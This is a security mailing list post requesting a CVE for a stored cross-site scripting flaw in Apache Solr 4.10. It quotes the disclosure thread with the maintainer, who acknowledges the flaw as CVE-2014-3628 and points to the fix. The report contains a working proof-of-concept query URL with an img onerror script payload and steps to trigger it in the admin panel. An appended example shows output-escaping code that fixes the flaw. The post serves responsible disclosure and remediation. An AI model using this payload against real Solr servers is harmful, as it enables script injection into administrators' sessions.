Message-ID: <CACd+vpeiS5ukjowuWVtNPZUGO+J-V=YCStT7NO679jYx=p+jJg@mail.gmail.com>
Date: Sun, 15 Mar 2015 14:30:44 +0530
From: Puneeth Gowda <puneethis021@...il.com>
To: oss-security@...ts.openwall.com
Subject: CVE Request - Apache Solr 4.10

Hi,

Please assign a CVE for this issue:

Software : Apache Solr
Version : 4.10

Thanks
Puneeth

FYI,

---------- Forwarded message ----------
From: Puneeth Gowda <puneethis021@...il.com>
Date: Tue, Nov 18, 2014 at 8:30 AM
Subject: Re: Security Vulnerability in Solr v4.10
To: Stefan Matheis <steffkes@...che.org>

Hello Stefan,

Patch is working fine. Issue has been fixed now.

Thanks
Puneeth

On Fri, Nov 14, 2014 at 1:51 AM, Stefan Matheis <steffkes@...che.org> wrote:

> Hi Puneeth
>
> I'm really sorry about the late reply - this is my first CVE I'm handling,
> so I'm trying to do it properly and wanted to ensure that everything is
> working according to plans & ASF agenda.
>
> The CVE you've asked about is CVE-2014-3628, the fix I was working on
> already is committed to trunk, you can have a look at the applied changes
> at https://issues.apache.org/jira/browse/SOLR-6738 . I'd be happy to know
> if that covers all the cases you've discovered or if there are more that
> I've missed with this fix!
>
> -Stefan
>
> On Sunday, November 2, 2014 at 8:38 AM, Puneeth Gowda wrote:
>
> Hi Stefan,
>
> Thank you for your response.
>
> I'd really appreciate it if you could assign a CVE to this bug!
>
> Thanks
> puneeth
>
> On Sun, Nov 2, 2014 at 4:52 AM, Stefan Matheis <steffkes@...che.org>
> wrote:
>
> Hi Puneeth
>
> Sorry for the late response, thanks for reporting this vulnerability - I'm
> hereby acknowledging it on behalf of the Lucene PMC.
>
> We have investigated your report and accept it. I'm already working on a
> fix.
>
> -Stefan
>
> -------- Original Message --------
> Subject: Security Vulnerability in Solr v4.10
> Date: Wed, 29 Oct 2014 16:57:06 +0530
> From: Puneeth Gowda <puneethis021@...il.com>
> To: security@...che.org
>
> Hi,
>
> I would like to report a stored XSS vulnerability in the Solr web app,
> version : 4.10
>
> ###################################################
> Vulnerability Name : Stored XSS
> Software : Apache Solr
> Version : 4.10
> ###################################################
>
> POC:
>
> Steps:
> 1) Search with the following query :
> fq=lang%3A1&fq=%3A1&facet=true&facet.field="}<img src=a
> onerror=alert(xss)>&facet.date=dateline&facet.date.start=2006-01-01T00%3A00%3A00.000Z%2FDAY&facet.date.end=2014-01-20T00%3A00%3A00.000Z%2FDAY%2B1DAY&facet.date.gap=%2B1DAY&facet.mincount=1&f.title.facet.limit=20&json.nl=map&sort=dateline%20desc&rows=1&facet_ranges=&q=*:*&wt=json
>
> Final URL :
> http://localhost:8080/solr/<app>/select?fq=lang%3A1&fq=%3A1&facet=true&facet.field="}<img src=a
> onerror=alert(xss)>&facet.date=dateline&facet.date.start=2006-01-01T00%3A00%3A00.000Z%2FDAY&facet.date.end=2014-01-20T00%3A00%3A00.000Z%2FDAY%2B1DAY&facet.date.gap=%2B1DAY&facet.mincount=1&f.title.facet.limit=20&json.nl=map&sort=dateline%20desc&rows=1&facet_ranges=&q=*:*&wt=json
>
> 2) Now browse to the Solr Admin panel
> URL: http://localhost:8080/solr/
> Click on Plugins/stats after selecting <core> from the drop down.
> Browser displays popup.
>
> Reason : The parameter "fieldvalucache" stores all searched queries
> without sanitizing, which results in execution of javascript.
>
> Thanks
> Puneeth
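
Added example, not part of the original thread and not code from the Solr project: the report's root cause (stored query values written into an admin page without output encoding) shown beside an encoded version. The function names and the shape of the stats object are assumptions made for illustration; the sample value is the facet.field string from the report.

```javascript
// Added illustration; not Solr's admin UI code. All names are hypothetical.
// Models a stats page that lists cache entries whose contents come from
// earlier search requests, i.e. attacker-influenced strings stored server-side.

const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Encode the five characters that can change the HTML parsing context.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Vulnerable pattern: stored names and values concatenated into markup as-is.
function renderStatsUnsafe(stats) {
  return Object.entries(stats)
    .map(([name, value]) => '<dt>' + name + '</dt><dd>' + value + '</dd>')
    .join('');
}

// Hardened pattern: every stored name and value is encoded on output.
function renderStatsEscaped(stats) {
  return Object.entries(stats)
    .map(([name, value]) => '<dt>' + escapeHtml(name) + '</dt><dd>' + escapeHtml(value) + '</dd>')
    .join('');
}

// Constructed sample: one numeric stat and one entry holding the stored value.
const sampleStats = {
  lookups: 3,
  'cache entry': '"}<img src=a onerror=alert(xss)>',
};

// Check used on the rendered output: is there an <img> tag the browser would parse?
function hasLiveImgTag(html) {
  return /<img\b/i.test(html);
}

console.log('unsafe render has live tag :', hasLiveImgTag(renderStatsUnsafe(sampleStats)));
console.log('escaped render has live tag:', hasLiveImgTag(renderStatsEscaped(sampleStats)));
```

Encoding at the point of output is what matters here, because the value was already stored before the admin page was ever opened.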